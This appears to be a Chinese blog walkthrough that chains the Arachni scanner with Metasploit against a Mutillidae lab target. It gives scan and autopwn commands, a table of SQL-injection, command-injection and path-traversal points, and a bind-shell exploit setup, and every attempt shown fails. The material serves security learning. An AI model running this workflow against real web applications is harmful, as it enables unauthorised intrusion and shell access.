WebApp exploitation with Arachni and Metasploit

http://www.milsec.net/metasploit%e5%ba%94%e7%94%a8/41.html

arachni作为一款开源的扫描软件,在判断web脚本漏洞上的效率和精确度还是让人称赞的,arachni作为一款主流的开源扫描软件,当然要跟随趋势,可以很好的和metasploit配合使用,通过msf plugin,与metasploit达到无缝对接。
今天我们演示arachni与metasploit配合对网站进行扫描检测和入侵。我的测试环境为

metasploitable+backbox+arachni+metasploit

首先我们通过arachni来对目标机进行扫描,看图说话,不多累赘:

root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf
WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory
Arachni - Web Application Security Scanner Framework v0.4.2
Author: Tasos "Zapotek" Laskos

(With the support of the community and the Arachni Team.)

Website: http://arachni-scanner.com
Documentation: http://arachni-scanner.com/wiki

[~] No modules were specified.
[~] -> Will run all mods. [~] No audit options were specified.
[~] -> Will audit links, forms and cookies.

通过扫描,保存扫描日志为msf格式,以便于metasploit调用。

为了引入arachni的plugin到metasploit,我们需找到arachni的目录,复制external/metasploit到metasploit的根目录下面
cp -R arachni/external/metasploit/* metasploit/

然后运行metasploit,加载arachni插件,运行如下图

root@metasploit:~# msfconsole

[!] Warning: This tool is located in /opt/backbox/msf
[i] Remember to give the full absolute path when specifying a file

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1168 exploits - 641 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > load arachni
[+] Added 1 Auxiliary modules for Arachni
[+] Added 4 Exploit modules for Arachni
[*] Successfully loaded plugin: arachni
msf > arachni_load /root/localhost.afr.msf
[*] Loading report...
[*] Loaded 21 vulnerabilities.

Unique exploits
===============

ID Exploit Description
-- ------- -----------
1 auxiliary/arachni_sqlmap

我们看下arachni的自动攻击参数
msf > arachni_autopwn
[*] Usage: arachni_autopwn [options]
-h Display this help text
-x [regexp] Only run modules whose name matches the regex
-a Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-m Use a meterpreter shell (if possible)
-q Disable exploit module output

我们选择加载所有的溢出来进行匹配

msf > arachni_autopwn -a
[*] Running pwn-jobs...

[*] [0 established sessions]): Waiting on 21 launched modules to finish execution...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
[*] Running exploit/unix/webapp/arachni_exec
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...

[*] Started bind handler
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Sending HTTP request for /mutillidae/index.php
[*] [0 established sessions]): Waiting on 0 launched modules to finish execution...

[*] The autopwn command has completed with 0 sessions
很不幸,木有一个成功的…………

接下来我们要看下arachni到底扫描出来了哪些漏洞,执行如下命令:


msf > arachni_list_vulns

Vulnerabilities
===============

ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
2 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
3 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create AccountXXinjectionXX", "my_signature"=>"1"} auxiliary/arachni_sqlmap
4 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret)", "confirm_password"=>"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
5 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
6 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
7 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
8 192.168.1.35 /mutillidae/index.php SQL Injection POST {"ToolID"=>"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"} auxiliary/arachni_sqlmap
9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
10 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
11 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog EntriesXXinjectionXX", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68"} auxiliary/arachni_sqlmap
12 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog Entries", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"} auxiliary/arachni_sqlmap
13 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "username"=>"arachni_name", "password"=>"5543!%arachni_secret", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"} auxiliary/arachni_sqlmap
14 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_nameXXinjectionXX"} auxiliary/arachni_sqlmap
15 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
16 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal
20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer", "initials"=>"1", "user-poll-php-submit-button"=>"Submit Vote"} unix/webapp/arachni_path_traversal
21 192.168.1.35 /mutillidae/index.php Path Traversal POST {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal

让俺这个土鳖手工溢出一下第17个漏洞

msf> arachni_manual 17
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
SRVHOST => 127.0.0.1
SRVPORT => 10401
RHOST => 192.168.1.35
RPORT => 80
LHOST => 127.0.0.1
LPORT => 5376
SSL => false
POST => target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS
METHOD => POST
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c
PATH => /mutillidae/index.php
[*] Done!
PAYLOAD => cmd/unix/bind_perl
msf exploit(arachni_exec) >

看下配置有没有问题,木有问题就开始执行,


msf exploit(arachni_exec) > show options

Module options (exploit/unix/webapp/arachni_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
GET no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
PATH /mutillidae/index.php yes The path to the vulnerable script.
POST target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
Proxies no Use a proxy chain
RHOST 192.168.1.35 yes The target address
RPORT 80 yes The target port
VHOST no HTTP server virtual host

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 5376 yes The listen port
RHOST 192.168.1.35 no The target address

Exploit target:

Id Name
-- ----
0 Automatic

看来是应该没问题了,手动执行一下,看看最近攒的人品攒够了没

-_-!!!人品不好,两次都没成功

msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) >

今天的这个测试环境很不给面子啊,一个都没成功,不过这里只是给大家展示,如何利用arachni和metasploit对一个web进行检测和入侵的过程,简单的吹水,高手请自动忽略,有问题请留言!!

你可能感兴趣的:(WebApp exploitation with Arachni and Metasploit)